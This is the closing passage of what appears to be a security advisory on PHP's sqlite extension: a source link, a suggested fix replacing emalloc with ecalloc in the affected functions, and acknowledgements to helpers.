[sqlite.c] http://lxr.php.net/source/php-src/ext/sqlite/sqlite.c sqlite module sources

-[ 5. Code fix

One possible fix is to use ecalloc instead of emalloc in the vulnerable functions.

-[ 6. Greetings

I would like to thank the following people for their contribution to my work:

  • Katabu for proof-reading and a great deal of patience
  • Snooty for proof-reading and feedback
  • dft-labs for providing me with a testing environment